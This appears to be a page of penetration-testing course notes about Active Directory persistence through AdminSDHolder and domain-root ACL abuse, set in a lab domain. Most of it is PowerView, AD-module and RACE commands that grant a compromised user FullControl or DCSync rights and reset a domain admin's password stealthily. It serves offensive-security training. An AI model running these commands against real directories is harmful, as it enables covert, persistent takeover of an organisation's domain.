ACLs

AdminSDHolder

In Active Directory, the AdminSDHolder object is a critical mechanism for securing privileged accounts. Located within the System container of a domain, AdminSDHolder acts as a template for Access Control Lists (ACLs) applied to members of Protected Groups—such as Domain Admins (DA), Enterprise Admins (EA), and others. This object is owned by the DA group, though the Local Administrators and EA groups can also assume ownership.

The Security Descriptor Propagator (SDPROP) is a built-in process that runs every 60 minutes. It synchronizes the ACLs of protected users and groups by overwriting their security descriptors with the one set on AdminSDHolder. Any changes made directly to these group ACLs will be reverted.

An attacker with DA privileges can alter the AdminSDHolder ACL to include a compromised user account with full access rights. This ensures that SDPROP will propagate those rights to all protected accounts on each run.

Add FullControl permissions to the AdminSDHolder object (as a DA):

Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student337 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local

Confirm the modification:

Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student337"}

Instead of granting full rights via GenericAll, specific permissions like ResetPassword or WriteMembers can be used for more stealthy access:

# Abuse the ResetPassword permissions
Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "P@assw0rd123!" -AsPlainText -Force) -Verbose

Add FullControl permissions to the AdminSDHolder object (as a DA) using the AD module and RACE toolkit

Set-DCPermissions -Method AdminSDHolder -SAMAccountName student337 -Right GenericAll -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local'

Confirm the modification:

(Get-Acl -Path 'AD:\CN=Domain Admins, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local').Access | ?{$_.IdentityReference -match 'student337'}

Instead of granting full rights via GenericAll, specific permissions like ResetPassword or WriteMembers can be used for more stealthy access:

# Abuse the ResetPassword permissions
Set-ADAccountPassword -Identity testda -NewPassword (ConvertTo-SecureString "P@assw0rd123!" -AsPlainText -Force) -Verbose

Domain Root

Beyond AdminSDHolder, a user with DA privileges can manipulate ACLs on the domain root to escalate or persist access.

# Assign FullControl rights
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student337 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local

# Assign DCSync rights
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student337 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local

# Assign FullControl rights
Set-ADACL -SamAccountName student337 -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Right GenericAll -Verbose

# Assign DCSync rights
Set-ADACL -SamAccountName student337 -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -GUIDRight DCSync -Verbose

PreviousPersistence NextSSP Injection

Last updated 7 months ago

hashtagAdminSDHolder

hashtagDomain Root

AdminSDHolder

Domain Root